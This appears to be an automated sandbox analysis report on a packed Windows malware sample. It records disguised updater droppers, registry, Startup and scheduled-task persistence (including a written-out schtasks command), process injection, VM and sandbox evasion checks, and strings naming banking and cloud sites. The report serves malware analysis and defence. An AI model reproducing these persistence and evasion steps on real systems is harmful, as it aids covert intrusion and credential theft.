Source: C:\Windows\SysWOW64\schtasks.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe Section loaded: taskschd.dll Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe Section loaded: xmllite.dll Jump to behavior
Source: C:\Users\user\AppData\Local\AdobeUpdaterV2_c81e728d9d4c2f636f067f89cc14862c\AdobeUpdaterV2.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\AdobeUpdaterV2_c81e728d9d4c2f636f067f89cc14862c\AdobeUpdaterV2.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Users\user\AppData\Local\AdobeUpdaterV2_c81e728d9d4c2f636f067f89cc14862c\AdobeUpdaterV2.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\AdobeUpdaterV2_c81e728d9d4c2f636f067f89cc14862c\AdobeUpdaterV2.exe Section loaded: ntmarta.dll Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe Section loaded: taskschd.dll Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe Section loaded: xmllite.dll Jump to behavior
Source: C:\Users\user\AppData\Local\AdobeUpdaterV2_45c48cce2e2d7fbdea1afc51c7c6ad26\AdobeUpdaterV2.exe Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\AdobeUpdaterV2_45c48cce2e2d7fbdea1afc51c7c6ad26\AdobeUpdaterV2.exe Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\AdobeUpdaterV2_45c48cce2e2d7fbdea1afc51c7c6ad26\AdobeUpdaterV2.exe Section loaded: ntmarta.dll
Source: C:\Windows\SysWOW64\schtasks.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\schtasks.exe Section loaded: taskschd.dll
Source: C:\Windows\SysWOW64\schtasks.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\schtasks.exe Section loaded: xmllite.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Protect\oobeldr.exe Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Protect\oobeldr.exe Section loaded: wldp.dll
Source: C:\Windows\SysWOW64\schtasks.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\schtasks.exe Section loaded: taskschd.dll
Source: C:\Windows\SysWOW64\schtasks.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\schtasks.exe Section loaded: xmllite.dll
Source: C:\Users\user\AppData\Local\Temp\EdgeMS2_45c48cce2e2d7fbdea1afc51c7c6ad26\EdgeMS2.exe Section loaded: apphelp.dll
Source: EdgeMS2.lnk.0.dr LNK file: ..\..\..\..\..\..\Local\Temp\EdgeMS2_45c48cce2e2d7fbdea1afc51c7c6ad26\EdgeMS2.exe
Source: C:\Users\user\Desktop\file.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 Jump to behavior
Source: file.exe Static file information: File size 4173312 > 1048576
Source: file.exe Static PE information: Raw size of .MPRESS1 is bigger than: 0x100000 < 0x3dec00
Source: Binary string: Z:\Development\Secureuser\src\plugins_manager\internal_plugins\embedded dlls\TlsHelperXBundler\Release\XBundlerTlsHelper.pdb source: file.exe, file.exe, 00000000.00000002.4535204352.000000000059F000.00000040.00000001.01000000.00000003.sdmp

Data Obfuscation
barindex
Detected unpacking (changes PE section rights)
Source: C:\Users\user\Desktop\file.exe Unpacked PE file: 0.2.file.exe.400000.0.unpack .MPRESS1:EW;.MPRESS2:EW;.rsrc:W; vs .MPRESS1:ER;.MPRESS2:ER;.rsrc:W;
Source: C:\Users\user\AppData\Local\Temp\heidiaXLeM4rqVSWS\VkHLTH_m2kErRb6vpA5n.exe Unpacked PE file: 10.2.VkHLTH_m2kErRb6vpA5n.exe.400000.0.unpack .MPRESS1:EW;.MPRESS2:EW;.rsrc:W; vs .MPRESS1:ER;.MPRESS2:ER;.rsrc:W;
Source: C:\ProgramData\MSIUpdaterV2_45c48cce2e2d7fbdea1afc51c7c6ad26\MSIUpdaterV2.exe Unpacked PE file: 13.2.MSIUpdaterV2.exe.400000.0.unpack .MPRESS1:EW;.MPRESS2:EW;.rsrc:W; vs .MPRESS1:ER;.MPRESS2:ER;.rsrc:W;
Source: C:\ProgramData\MSIUpdaterV2_45c48cce2e2d7fbdea1afc51c7c6ad26\MSIUpdaterV2.exe Unpacked PE file: 14.2.MSIUpdaterV2.exe.400000.0.unpack .MPRESS1:EW;.MPRESS2:EW;.rsrc:W; vs .MPRESS1:ER;.MPRESS2:ER;.rsrc:W;
Source: C:\Users\user\AppData\Roaming\Microsoft\Protect\oobeldr.exe Unpacked PE file: 15.2.oobeldr.exe.400000.0.unpack .MPRESS1:EW;.MPRESS2:EW;.rsrc:W; vs .MPRESS1:ER;.MPRESS2:ER;.rsrc:W;
Source: C:\Users\user\AppData\Local\Temp\heidiaXLeM4rqVSWS\IQUKpYR1BFFsqw1YWBOv.exe Unpacked PE file: 22.2.IQUKpYR1BFFsqw1YWBOv.exe.400000.0.unpack .MPRESS1:EW;.MPRESS2:EW;.rsrc:W; vs .MPRESS1:ER;.MPRESS2:ER;.rsrc:W;
Source: C:\ProgramData\MSIUpdaterV2_c81e728d9d4c2f636f067f89cc14862c\MSIUpdaterV2.exe Unpacked PE file: 23.2.MSIUpdaterV2.exe.400000.0.unpack .MPRESS1:EW;.MPRESS2:EW;.rsrc:W; vs .MPRESS1:ER;.MPRESS2:ER;.rsrc:W;
Source: C:\ProgramData\MSIUpdaterV2_c81e728d9d4c2f636f067f89cc14862c\MSIUpdaterV2.exe Unpacked PE file: 24.2.MSIUpdaterV2.exe.400000.0.unpack .MPRESS1:EW;.MPRESS2:EW;.rsrc:W; vs .MPRESS1:ER;.MPRESS2:ER;.rsrc:W;
Source: C:\Users\user\AppData\Local\AdobeUpdaterV2_45c48cce2e2d7fbdea1afc51c7c6ad26\AdobeUpdaterV2.exe Unpacked PE file: 29.2.AdobeUpdaterV2.exe.400000.0.unpack .MPRESS1:EW;.MPRESS2:EW;.rsrc:W; vs .MPRESS1:ER;.MPRESS2:ER;.rsrc:W;
Source: C:\Users\user\AppData\Local\AdobeUpdaterV2_c81e728d9d4c2f636f067f89cc14862c\AdobeUpdaterV2.exe Unpacked PE file: 32.2.AdobeUpdaterV2.exe.400000.0.unpack .MPRESS1:EW;.MPRESS2:EW;.rsrc:W; vs .MPRESS1:ER;.MPRESS2:ER;.rsrc:W;
Source: C:\Users\user\AppData\Local\AdobeUpdaterV2_45c48cce2e2d7fbdea1afc51c7c6ad26\AdobeUpdaterV2.exe Unpacked PE file: 35.2.AdobeUpdaterV2.exe.400000.0.unpack .MPRESS1:EW;.MPRESS2:EW;.rsrc:W; vs .MPRESS1:ER;.MPRESS2:ER;.rsrc:W;
Source: C:\Users\user\AppData\Roaming\Microsoft\Protect\oobeldr.exe Unpacked PE file: 38.2.oobeldr.exe.400000.0.unpack .MPRESS1:EW;.MPRESS2:EW;.rsrc:W; vs .MPRESS1:ER;.MPRESS2:ER;.rsrc:W;
Source: C:\Users\user\AppData\Local\AdobeUpdaterV2_c81e728d9d4c2f636f067f89cc14862c\AdobeUpdaterV2.exe Unpacked PE file: 41.2.AdobeUpdaterV2.exe.400000.0.unpack .MPRESS1:EW;.MPRESS2:EW;.rsrc:W; vs .MPRESS1:ER;.MPRESS2:ER;.rsrc:W;
Source: C:\Users\user\AppData\Local\Temp\EdgeMS2_45c48cce2e2d7fbdea1afc51c7c6ad26\EdgeMS2.exe Unpacked PE file: 42.2.EdgeMS2.exe.400000.0.unpack .MPRESS1:EW;.MPRESS2:EW;.rsrc:W; vs .MPRESS1:ER;.MPRESS2:ER;.rsrc:W;
Contains functionality to dynamically determine API calls
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00418BB0 VirtualAllocEx,WriteProcessMemory,WriteProcessMemory,VirtualAllocEx,LoadLibraryA,GetProcAddress,WriteProcessMemory,WriteProcessMemory,CreateRemoteThread, 0_2_00418BB0
Entry point lies outside standard sections
Source: initial sample Static PE information: section where entry point is pointing to: .MPRESS2
PE file contains sections with non-standard names
Source: file.exe Static PE information: section name: .MPRESS1
Source: file.exe Static PE information: section name: .MPRESS2
Source: l2[1].exe.0.dr Static PE information: section name: .MPRESS1
Source: l2[1].exe.0.dr Static PE information: section name: .MPRESS2
Source: VkHLTH_m2kErRb6vpA5n.exe.0.dr Static PE information: section name: .MPRESS1
Source: VkHLTH_m2kErRb6vpA5n.exe.0.dr Static PE information: section name: .MPRESS2
Source: AdobeUpdaterV2.exe.0.dr Static PE information: section name: .MPRESS1
Source: AdobeUpdaterV2.exe.0.dr Static PE information: section name: .MPRESS2
Source: MSIUpdaterV2.exe.0.dr Static PE information: section name: .MPRESS1
Source: MSIUpdaterV2.exe.0.dr Static PE information: section name: .MPRESS2
Source: EdgeMS2.exe.0.dr Static PE information: section name: .MPRESS1
Source: EdgeMS2.exe.0.dr Static PE information: section name: .MPRESS2
Source: k[1].exe.0.dr Static PE information: section name: .MPRESS1
Source: k[1].exe.0.dr Static PE information: section name: .MPRESS2
Source: IQUKpYR1BFFsqw1YWBOv.exe.0.dr Static PE information: section name: .MPRESS1
Source: IQUKpYR1BFFsqw1YWBOv.exe.0.dr Static PE information: section name: .MPRESS2
Source: AdobeUpdaterV2.exe0.0.dr Static PE information: section name: .MPRESS1
Source: AdobeUpdaterV2.exe0.0.dr Static PE information: section name: .MPRESS2
Source: MSIUpdaterV2.exe0.0.dr Static PE information: section name: .MPRESS1
Source: MSIUpdaterV2.exe0.0.dr Static PE information: section name: .MPRESS2
Source: EdgeMS2.exe0.0.dr Static PE information: section name: .MPRESS1
Source: EdgeMS2.exe0.0.dr Static PE information: section name: .MPRESS2
Source: oobeldr.exe.10.dr Static PE information: section name: .MPRESS1
Source: oobeldr.exe.10.dr Static PE information: section name: .MPRESS2
Uses code obfuscation techniques (call, push, ret)
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00703045 push 5EF45176h; mov dword ptr [esp], ebp 0_2_008F97B5
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_007020F7 push ebp; mov dword ptr [esp], esi 0_2_008F908B
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_007020F7 push edx; mov dword ptr [esp], 68A8A828h 0_2_008F909F
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_007020F7 push 047071F5h; mov dword ptr [esp], ecx 0_2_008F9171
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_007020F7 push edx; mov dword ptr [esp], ebp 0_2_008F918B
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_007090FE push 609BC6DEh; mov dword ptr [esp], eax 0_2_008E98A1
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_007090FE push edi; mov dword ptr [esp], 2DFCA35Fh 0_2_008E98F7
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_007090FE push edi; mov dword ptr [esp], 0C6D5282h 0_2_008E9950
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_007090FE push 70833598h; mov dword ptr [esp], ebp 0_2_008E996E
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_007080D4 push edx; mov dword ptr [esp], 6EFF823Dh 0_2_008F4F73
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_007080D4 push edi; mov dword ptr [esp], ebp 0_2_008F4FF3
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_007080D4 push edx; mov dword ptr [esp], edi 0_2_008F5015
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_007080D4 push 3CDC3E98h; mov dword ptr [esp], edi 0_2_008F508D
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_007090BA push 6BAD0365h; mov dword ptr [esp], esi 0_2_008E3715
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_007090BA push eax; mov dword ptr [esp], 6FBB81C3h 0_2_008E3803
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_007040BB push 33109B05h; mov dword ptr [esp], edx 0_2_008FA131
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_007040BB push 5D0E68DBh; mov dword ptr [esp], edx 0_2_008FA1C8
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_007040BB push 670C21C9h; mov dword ptr [esp], ebp 0_2_008FA1DB
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_007040BB push 4B9FE2C1h; mov dword ptr [esp], ecx 0_2_008FA21B
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00702098 push 64A594B0h; mov dword ptr [esp], ecx 0_2_008F2E35
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00702098 push edi; mov dword ptr [esp], esi 0_2_008F2E5F
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00702098 push 22266561h; mov dword ptr [esp], ebp 0_2_008F2E87
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00700176 push eax; mov dword ptr [esp], 00000004h 0_2_008EB281
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00700176 push eax; mov dword ptr [esp], esi 0_2_008EB2EF
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00700176 push 18B1E7D9h; mov dword ptr [esp], ebx 0_2_008EB382
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00700176 push edi; mov dword ptr [esp], edx 0_2_008EB3BE
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00708167 push 1F83EE5Ah; mov dword ptr [esp], esp 0_2_008E2C6E
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00708167 push ebp; mov dword ptr [esp], esi 0_2_008E2C94
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00704157 push ebp; mov dword ptr [esp], 000AA975h 0_2_008E1AC2
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00702158 push ebp; mov dword ptr [esp], 67CCA1B0h 0_2_008E0A96
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00702158 push 03068F7Dh; mov dword ptr [esp], ebx 0_2_008E0AEC
Drops PE files
Source: C:\Users\user\Desktop\file.exe File created: C:\Users\user\AppData\Local\Temp\heidiaXLeM4rqVSWS\VkHLTH_m2kErRb6vpA5n.exe Jump to dropped file
Source: C:\Users\user\Desktop\file.exe File created: C:\ProgramData\MSIUpdaterV2_c81e728d9d4c2f636f067f89cc14862c\MSIUpdaterV2.exe Jump to dropped file
Source: C:\Users\user\Desktop\file.exe File created: C:\ProgramData\MSIUpdaterV2_45c48cce2e2d7fbdea1afc51c7c6ad26\MSIUpdaterV2.exe Jump to dropped file
Source: C:\Users\user\Desktop\file.exe File created: C:\Users\user\AppData\Local\AdobeUpdaterV2_c81e728d9d4c2f636f067f89cc14862c\AdobeUpdaterV2.exe Jump to dropped file
Source: C:\Users\user\Desktop\file.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\l2[1].exe Jump to dropped file
Source: C:\Users\user\Desktop\file.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BLNS00AZ\k[1].exe Jump to dropped file
Source: C:\Users\user\Desktop\file.exe File created: C:\Users\user\AppData\Local\Temp\heidiaXLeM4rqVSWS\IQUKpYR1BFFsqw1YWBOv.exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\heidiaXLeM4rqVSWS\VkHLTH_m2kErRb6vpA5n.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Protect\oobeldr.exe Jump to dropped file
Source: C:\Users\user\Desktop\file.exe File created: C:\Users\user\AppData\Local\Temp\EdgeMS2_c81e728d9d4c2f636f067f89cc14862c\EdgeMS2.exe Jump to dropped file
Source: C:\Users\user\Desktop\file.exe File created: C:\Users\user\AppData\Local\AdobeUpdaterV2_45c48cce2e2d7fbdea1afc51c7c6ad26\AdobeUpdaterV2.exe Jump to dropped file
Source: C:\Users\user\Desktop\file.exe File created: C:\Users\user\AppData\Local\Temp\EdgeMS2_45c48cce2e2d7fbdea1afc51c7c6ad26\EdgeMS2.exe Jump to dropped file
Drops PE files to the application program directory (C:\ProgramData)
Source: C:\Users\user\Desktop\file.exe File created: C:\ProgramData\MSIUpdaterV2_c81e728d9d4c2f636f067f89cc14862c\MSIUpdaterV2.exe Jump to dropped file
Source: C:\Users\user\Desktop\file.exe File created: C:\ProgramData\MSIUpdaterV2_45c48cce2e2d7fbdea1afc51c7c6ad26\MSIUpdaterV2.exe Jump to dropped file

Boot Survival
barindex
Creates multiple autostart registry keys
Source: C:\Users\user\Desktop\file.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run AdobeUpdaterV2_c81e728d9d4c2f636f067f89cc14862c Jump to behavior
Source: C:\Users\user\Desktop\file.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run AdobeUpdaterV2_45c48cce2e2d7fbdea1afc51c7c6ad26 Jump to behavior
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Source: C:\Users\user\Desktop\file.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\Desktop\file.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\Desktop\file.exe Window searched: window name: RegmonClass Jump to behavior
Uses schtasks.exe or at.exe to add and modify task schedules
Source: C:\Users\user\Desktop\file.exe Process created: C:\Windows\SysWOW64\schtasks.exe schtasks /create /f /RU "user" /tr "C:\ProgramData\MSIUpdaterV2_45c48cce2e2d7fbdea1afc51c7c6ad26\MSIUpdaterV2.exe" /tn "MSIUpdaterV2_45c48cce2e2d7fbdea1afc51c7c6ad26 HR" /sc HOURLY /rl HIGHEST
Creates a start menu entry (Start Menu\Programs\Startup)
Source: C:\Users\user\Desktop\file.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\EdgeMS2.lnk Jump to behavior
Stores files to the Windows start menu directory
Source: C:\Users\user\Desktop\file.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\EdgeMS2.lnk Jump to behavior
Source: C:\Users\user\Desktop\file.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run AdobeUpdaterV2_45c48cce2e2d7fbdea1afc51c7c6ad26 Jump to behavior
Source: C:\Users\user\Desktop\file.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run AdobeUpdaterV2_45c48cce2e2d7fbdea1afc51c7c6ad26 Jump to behavior
Source: C:\Users\user\Desktop\file.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run AdobeUpdaterV2_c81e728d9d4c2f636f067f89cc14862c Jump to behavior
Source: C:\Users\user\Desktop\file.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run AdobeUpdaterV2_c81e728d9d4c2f636f067f89cc14862c Jump to behavior
Extensive use of GetProcAddress (often used to hide API calls)
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00481A30 GetModuleHandleA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress, 0_2_00481A30
Source: C:\Users\user\Desktop\file.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\schtasks.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\schtasks.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\schtasks.exe Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion
barindex
Contains functionality to implement multi-threaded time evasion
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_063EC230 CreateThread,Sleep, call eax 0_2_063EC230
Found API chain indicative of sandbox detection
Source: C:\Users\user\Desktop\file.exe Sandbox detection routine: GetCursorPos, DecisionNode, Sleep
Found evasive API chain (may stop execution after reading information in the PEB, e.g. number of processors)
Source: C:\Users\user\Desktop\file.exe Evasive API call chain: GetPEB, DecisionNodes, Sleep
Found stalling execution ending in API Sleep call
Source: C:\Users\user\Desktop\file.exe Stalling execution: Execution stalls by calling Sleep
Query firmware table information (likely to detect VMs)
Source: C:\Users\user\Desktop\file.exe System information queried: FirmwareTableInformation Jump to behavior
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Source: C:\Users\user\Desktop\file.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__ Jump to behavior
Contains capabilities to detect virtual machines
Source: C:\Users\user\Desktop\file.exe Registry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDesc Jump to behavior
Source: C:\Users\user\Desktop\file.exe Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersion Jump to behavior
Source: C:\Users\user\Desktop\file.exe Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersion Jump to behavior
Contains functionality to detect sandboxes (mouse cursor move detection)
Source: C:\Users\user\Desktop\file.exe Code function: GetCursorPos,GetCursorPos,GetCursorPos,Sleep,GetCursorPos,Sleep,GetCursorPos, 0_2_0045D9F0
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Source: C:\Users\user\Desktop\file.exe Window / User API: threadDelayed 7709 Jump to behavior
Source: C:\Users\user\Desktop\file.exe Window / User API: threadDelayed 1444 Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Protect\oobeldr.exe Window / User API: threadDelayed 9995
Found decision node followed by non-executed suspicious APIs
Source: C:\Users\user\Desktop\file.exe Decision node followed by non-executed suspicious API: DecisionNode, Non Executed (send or recv or WinExec)
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Users\user\Desktop\file.exe TID: 1292 Thread sleep time: -30000s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\file.exe TID: 5864 Thread sleep time: -984000s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\file.exe TID: 1292 Thread sleep time: -7709000s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\file.exe TID: 5864 Thread sleep time: -4332000s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Protect\oobeldr.exe TID: 4392 Thread sleep count: 9995 > 30
Source: C:\Users\user\AppData\Roaming\Microsoft\Protect\oobeldr.exe TID: 4392 Thread sleep time: -2248875s >= -30000s
Sample execution stops while process was sleeping (likely an evasion)
Source: C:\Users\user\Desktop\file.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Users\user\AppData\Roaming\Microsoft\Protect\oobeldr.exe Last function: Thread delayed
Source: C:\Users\user\AppData\Roaming\Microsoft\Protect\oobeldr.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_004DB1CB FindFirstFileExW,GetLastError, 0_2_004DB1CB
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_0040B300 FindFirstFileA,FindNextFileA,GetLastError,SetFileAttributesA,GetLastError,RemoveDirectoryA,GetLastError,GetLastError,std::_Throw_Cpp_error,std::_Throw_Cpp_error, 0_2_0040B300
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_063CB2C0 FindFirstFileA,CreateDirectoryA,GetLastError,CopyFileA,GetLastError,CopyFileA,GetLastError,CopyFileA,GetLastError,FindNextFileA,FindClose,GetLastError, 0_2_063CB2C0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_06402EAD GetFileAttributesExW,GetLastError,FindFirstFileW,GetLastError,FindClose,___std_fs_open_handle@16,GetFileInformationByHandleEx,GetLastError,GetFileInformationByHandleEx,GetFileInformationByHandleEx, 0_2_06402EAD
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_0641CCFD FindFirstFileExW, 0_2_0641CCFD
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_06426276 VirtualQuery,GetSystemInfo, 0_2_06426276
Source: C:\Users\user\Desktop\file.exe Thread delayed: delay time: 30000 Jump to behavior
Source: file.exe, 00000000.00000003.2389362003.0000000005D75000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: secure.bankofamerica.comVMware20,11696@
Source: 4tSPFpXQutr4Web Data.0.dr Binary or memory string: discord.comVMware20,11696487552f
Source: file.exe, 00000000.00000002.4548516421.0000000005D30000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: 9e146be9-c76a-4720-bcdb-53011b87bd06_{a33c7340-61ca-11ee-8c18-806e6f6e6963}_\\?\scsi#disk&ven_vmware&prod_virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}_B46CC078
Source: file.exe, 00000000.00000002.4548751165.0000000005F5B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \\?\scsi#disk&ven_vmware&prod_virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}5o
Source: file.exe, 00000000.00000003.2389362003.0000000005D75000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: ra Change Transaction PasswordVMware20,11696487552
Source: 4tSPFpXQutr4Web Data.0.dr Binary or memory string: www.interactivebrokers.comVMware20,11696487552}
Source: 4tSPFpXQutr4Web Data.0.dr Binary or memory string: ms.portal.azure.comVMware20,11696487552
Source: file.exe, 00000000.00000003.3589404399.0000000000EEE000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.4545138703.0000000000EAC000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.4546972103.0000000000EEE000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
Source: 4tSPFpXQutr4Web Data.0.dr Binary or memory string: Interactive Brokers - COM.HKVMware20,11696487552
Source: 4tSPFpXQutr4Web Data.0.dr Binary or memory string: global block list test formVMware20,11696487552
Source: 4tSPFpXQutr4Web Data.0.dr Binary or memory string: tasks.office.comVMware20,11696487552o
Source: file.exe, 00000000.00000003.2336812668.0000000000EC1000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \\?\SCSI#Disk&Ven_VMware&Prod_Virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}
Source: 4tSPFpXQutr4Web Data.0.dr Binary or memory string: AMC password management pageVMware20,11696487552
Source: 4tSPFpXQutr4Web Data.0.dr Binary or memory string: interactivebrokers.comVMware20,11696487552
Source: 4tSPFpXQutr4Web Data.0.dr Binary or memory string: dev.azure.comVMware20,11696487552j
Source: file.exe, 00000000.00000002.4545138703.0000000000EAC000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000&
Source: 4tSPFpXQutr4Web Data.0.dr Binary or memory string: microsoft.visualstudio.comVMware20,11696487552x
Source: file.exe, 00000000.00000003.2389362003.0000000005D75000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: ebrokers.co.inVMware20,11696487552d
Source: 4tSPFpXQutr4Web Data.0.dr Binary or memory string: netportal.hdfcbank.comVMware20,11696487552
Source: 4tSPFpXQutr4Web Data.0.dr Binary or memory string: trackpan.utiitsl.comVMware20,11696487552h
Source: file.exe, 00000000.00000003.2389362003.0000000005D75000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: .comVMware20,11696487
Source: file.exe, 00000000.00000003.2278727954.0000000002A60000.00000004.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000003.2286552922.0000000002A60000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: \SystemRoot\system32\ntkrnlmp.exeSDT\VBOX__=l{TW
Source: 4tSPFpXQutr4Web Data.0.dr Binary or memory string: outlook.office365.comVMware20,11696487552t
